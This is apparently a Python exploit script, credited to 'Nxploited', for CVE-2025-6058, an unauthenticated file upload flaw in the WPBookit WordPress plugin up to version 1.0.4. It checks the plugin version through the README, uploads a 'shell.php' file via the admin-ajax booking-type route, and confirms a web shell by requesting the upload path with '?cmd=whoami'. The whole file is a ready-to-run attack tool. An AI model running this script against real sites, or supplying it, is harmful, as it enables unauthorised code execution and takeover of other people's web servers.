import argparse import requests import re import os import sys import time from datetime import datetime requests.packages.urllib3.disable_warnings() def print_banner(): banner = r""" ______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______ / \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \ /$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ | $$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ | $$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$< $$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ | $$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ | $$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/ $$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ """ print(banner) print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited\n") def format_url(url): if not url.startswith("http://") and not url.startswith("https://"): url = "http://" + url if url.endswith('/'): url = url[:-1] return url def version_to_tuple(version): return tuple(int(part) for part in version.split('.')) def is_vulnerable_version(found_version, max_vulnerable="1.0.4"): try: return version_to_tuple(found_version) <= version_to_tuple(max_vulnerable) except Exception: return False def get_version(url, session, headers): print("[*] Checking plugin version ...") time.sleep(3) readme_url = f"{url}/wp-content/plugins/wpbookit/README.txt" resp = session.get(readme_url, headers=headers, timeout=10) if resp.status_code != 200: return None match = re.search(r"Stable tag:\s*([0-9.]+)", resp.text) if not match: return None version = match.group(1).strip() if is_vulnerable_version(version, "1.0.4"): return version else: return None def make_shell(): shell = '' shell_name = "shell.php" with open(shell_name, "w") as f: f.write(shell) return shell_name def Nxploited(url, session, headers): print("[*] Exploiting file upload ...") time.sleep(2) ajax_url = f"{url}/wp-admin/admin-ajax.php" shell_file = make_shell() with open(shell_file, 'rb') as f: files = { 'cover_image_img': (shell_file, f, 'application/octet-stream') } data = { 'action': 'wpb_ajax_post', 'route_name': 'add_booking_type', 'title': 'Test', 'booking_type': 'Nxploited' } resp = session.post(ajax_url, headers=headers, files=files, data=data, timeout=15) now = datetime.now() shell_path = f"wp-content/uploads/{now.year}/{now.strftime('%m')}/shell.php?cmd=whoami" check_url = f"{url}/{shell_path}" check = session.get(check_url, headers=headers, timeout=10) os.remove(shell_file) if check.status_code == 200 and check.text.strip() and "whoami" not in check.text: return shell_path else: return None def main(): print_banner() parser = argparse.ArgumentParser(description="CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)") parser.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com") args = parser.parse_args() session = requests.Session() session.verify = False headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" } url = format_url(args.url) version = get_version(url, session, headers) if not version: print("[-] Target is not vulnerable or version could not be detected.") sys.exit(1) shell_path = Nxploited(url, session, headers) if shell_path: print(f"[+] Exploitation successful!") print(f"[+] Shell path: {shell_path}") print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited") else: print("[-] Exploitation failed or shell could not be confirmed.") if __name__ == "__main__": main()